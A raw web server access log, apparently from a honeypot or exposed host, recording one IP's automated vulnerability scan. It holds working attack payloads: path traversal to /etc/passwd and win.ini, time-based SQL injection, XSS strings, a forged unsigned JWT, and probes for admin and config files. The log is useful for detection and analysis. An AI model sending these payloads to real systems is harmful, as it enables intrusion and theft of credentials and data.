195.164.49.69 - - [20/Oct/2024:19:51:25 +0000] GET /?echo+boaYVdGDrS HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:51:28 +0000] POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:51:41 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:51:47 +0000] POST /_adminer/index.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:51:53 +0000] POST /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:51:53 +0000] POST /adminer/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:51:53 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:51:53 +0000] POST /adminer/adminer.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:51:53 +0000] POST /_adminer.php HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:51:58 +0000] POST /contactus.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:52:09 +0000] POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:52:11 +0000] POST /index.php HTTP/1.1 404 1083
83.212.98.101 - - [20/Oct/2024:19:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:52:30 +0000] GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:19:52:34 +0000] POST /spcgi.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:52:38 +0000] GET /api/auth/cognito/callback?access_token=kzbuxzai&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoibG5pYnJ3eG9rayIsImVtYWlsIjoie3tlbWFpbH19In0=. HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:52:52 +0000] POST /classes/common/busiFacade.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:53:14 +0000] POST /clients/MyCRL HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:53:36 +0000] GET /index.php?noAUTO=1 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:53:38 +0000] POST /cgi-bin/cstecgi.cgi HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:53:39 +0000] GET /9gZpCH.txt HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:54:01 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:54:03 +0000] GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:54:26 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:54:30 +0000] POST /jtcgi/soap_cgi.pyc HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:54:51 +0000] GET /ProcessPlus HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:54:55 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:54:58 +0000] GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:19:55:19 +0000] GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:19:55:21 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:55:23 +0000] POST /login.html HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:55:27 +0000] GET /user HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:55:27 +0000] POST /signin HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:55:29 +0000] GET /index.asp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:55:31 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:55:33 +0000] POST /cobbler_api HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:55:35 +0000] POST /cobbler_api HTTP/1.1 404 1085
83.212.98.101 - - [20/Oct/2024:19:55:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:55:53 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:53 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:53 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:53 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:54 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:55 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:56 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:55:57 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:56:00 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:56:09 +0000] POST /login.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:56:11 +0000] POST /rest/auth/login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:56:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:56:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:56:19 +0000] POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:19:56:21 +0000] GET /api/proxy/tcp HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:56:41 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:41 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:41 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:41 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:42 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:45 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:19:56:47 +0000] POST /ibmmq/console/j_security_check HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:56:51 +0000] POST /ibmmq/console/j_security_check HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:56:51 +0000] POST /ibmmq/console/j_security_check HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:56:53 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:56:55 +0000] GET /login_password_page.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:56:59 +0000] POST /netflow/jspui/j_security_check HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:19:57:01 +0000] POST /xmlpserver/services/XMLPService HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:19:57:03 +0000] POST /public/checklogin.htm HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:57:05 +0000] GET /userRpm/LoginRpm.htm?Save=Save HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:57:07 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:57:09 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:57:11 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:19:57:13 +0000] POST /ZMC_Admin_Login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:57:15 +0000] POST /api/v1/users/signup HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:57:17 +0000] PUT /testing-put.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:19:57:19 +0000] GET /testing-put.txt HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:57:21 +0000] POST /Onboarding/Import HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:57:23 +0000] POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:19:57:25 +0000] GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1 404 1124
83.212.98.101 - - [20/Oct/2024:19:57:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:57:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:57:31 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:57:53 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:57:55 +0000] GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:58:16 +0000] POST /json-rpc/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:58:18 +0000] GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:58:19 +0000] GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:19:59:00 +0000] GET /product-details.php?id=1%20AND%20(SELECT%206812%20FROM%20(SELECT(SLEEP(6)))DddL) HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:59:22 +0000] POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(6)),1,2356) HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:59:24 +0000] POST /sitemap.xml?offset=1;SELECT%20IF((SLEEP(16)),1,2356) HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:00:03 +0000] GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1 404 1194
195.164.49.69 - - [20/Oct/2024:20:00:19 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:00:22 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:00:24 +0000] GET /wp-content/plugins/knews/readme.txt HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:20:00:26 +0000] GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1 404 1151
195.164.49.69 - - [20/Oct/2024:20:00:28 +0000] GET /service/~baseapp/UploadServlet HTTP/1.1 404 1112
83.212.98.101 - - [20/Oct/2024:20:00:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:01:11 +0000] GET /.ftpconfig HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:01:12 +0000] GET /umweb/../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:01:36 +0000] GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:01:58 +0000] GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:02:19 +0000] GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1 404 1091
83.212.98.101 - - [20/Oct/2024:20:02:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:02:41 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:02:43 +0000] GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:03:24 +0000] GET /jeecg-boot/sys/user/querySysUser?username=admin HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:03:26 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:20:03:28 +0000] GET /solr/admin/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:03:29 +0000] GET /nagiosxi/install.php HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:03:31 +0000] GET /UI/Dashboard HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:03:33 +0000] GET /jackett/UI/Dashboard HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:03:37 +0000] GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:03:39 +0000] GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:03:41 +0000] GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1103
- - - [20/Oct/2024:20:04:02 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:04:04 +0000] GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:20:04:26 +0000] GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:04:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:04:49 +0000] GET /owncloud/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:04:52 +0000] GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:20:05:13 +0000] GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1 404 1156
- - - [20/Oct/2024:20:05:34 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [20/Oct/2024:20:05:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:05:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:05:58 +0000] GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:20:06:00 +0000] GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:06:22 +0000] GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:06:24 +0000] GET /tshirtecommerce/fonts.php?name=2&type=./../index.php HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:06:26 +0000] GET /storage/logs/laravel.log HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:06:28 +0000] GET /wp-includes/sym404/root/etc/passwd HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:20:06:30 +0000] GET /jeecg-boot/actuator/httptrace/ HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:20:06:32 +0000] GET /modules/simpleimportproduct/send.php?phpinfo=1 HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:06:34 +0000] GET /modules/updateproducts/send.php?phpinfo=1 HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:20:06:39 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:06:41 +0000] GET /images/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:07:02 +0000] GET /config/pw_left_bar.html HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:07:04 +0000] GET /backend/admin/users?username=anonymous HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:07:06 +0000] GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:07:08 +0000] GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1 404 1106
83.212.98.101 - - [20/Oct/2024:20:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:07:49 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:20:08:11 +0000] GET /ad-list-search?keyword&keyword&lat&lat&long&long&location&category HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:08:13 +0000] GET /setup HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:20:08:15 +0000] GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:08:16 +0000] GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:20:08:38 +0000] GET /wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:20:08:40 +0000] GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1 404 1126
- - - [20/Oct/2024:20:08:42 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:09:04 +0000] GET /install/install.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:09:06 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:20:09:08 +0000] GET /parameters.yml HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:09:09 +0000] GET /app/config/parameters.yml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:20:09:11 +0000] GET /parameters.yml.dist HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:20:09:13 +0000] GET /app/config/parameters.yml.dist HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:09:16 +0000] GET /install HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:20:09:17 +0000] GET /admin/install/server HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:09:19 +0000] GET /../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:09:41 +0000] GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1149
195.164.49.69 - - [20/Oct/2024:20:10:03 +0000] GET /wp-json/acf/v3/options/a?id=active&field=plugins HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:20:10:05 +0000] GET /index.asp HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:10:07 +0000] GET /static/link/%2e%2e/etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:20:10:28 +0000] GET /admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:10:30 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:10:32 +0000] GET /onlinePreview?url=aHR0cDovL29hc3QuZnVuL3JvYm90cy50eHQ= HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:10:34 +0000] GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:20:10:37 +0000] GET /jshERP-boot/user/getAllList;.ico HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:20:10:39 +0000] GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1169
195.164.49.69 - - [20/Oct/2024:20:10:40 +0000] GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:10:42 +0000] GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:10:44 +0000] GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1 404 1097
83.212.98.101 - - [20/Oct/2024:20:10:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:10:46 +0000] GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:10:48 +0000] GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:10:49 +0000] GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:10:51 +0000] GET /configure HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:10:53 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:10:55 +0000] GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1188
195.164.49.69 - - [20/Oct/2024:20:10:57 +0000] GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1 404 1201
195.164.49.69 - - [20/Oct/2024:20:10:59 +0000] GET /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config HTTP/1.1 404 1135
- - - [20/Oct/2024:20:11:01 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:11:03 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:20:11:04 +0000] GET /elmah HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:20:11:06 +0000] GET /elmah.axd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:11:08 +0000] GET /install.html HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:11:10 +0000] GET /ui/login.php?user=admin HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:11:12 +0000] GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:20:11:14 +0000] GET /../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:11:16 +0000] GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:11:17 +0000] GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:11:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:11:21 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:11:23 +0000] GET /admin_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:11:25 +0000] GET /index_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:11:27 +0000] GET /app_dev.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:20:11:29 +0000] GET /phpwiki/index.php/passwd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:11:30 +0000] GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:11:32 +0000] GET /api/v1/user/save?ID&Username=prp6j&Role=%e7%ae%a1%e7%90%86%e5%91%98&Enable=true HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:11:34 +0000] GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:11:36 +0000] GET /front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:11:39 +0000] GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:20:11:41 +0000] GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1151
195.164.49.69 - - [20/Oct/2024:20:11:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:11:52 +0000] GET /__ HTTP/1.1 404 1076
- - - [20/Oct/2024:20:12:16 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:12:18 +0000] POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 404 1105
83.212.98.101 - - [20/Oct/2024:20:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:12:39 +0000] POST /magmi/web/magmi_saveprofile.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:20:12:41 +0000] POST /magmi/web/magmi_run.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:12:43 +0000] GET /magmi/web/info.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:12:45 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:20:12:49 +0000] POST /seo/seopanel/login.php?sec=forgot HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:20:12:51 +0000] POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:13:05 +0000] POST /api/graphql HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:20:13:09 +0000] GET /?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1 200 11204
- - - [20/Oct/2024:20:13:11 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:13:13 +0000] POST /wp-login.php?wlcms-action=preview HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:13:15 +0000] POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:20:13:17 +0000] POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:20:13:19 +0000] POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:20:13:21 +0000] GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1 404 1133
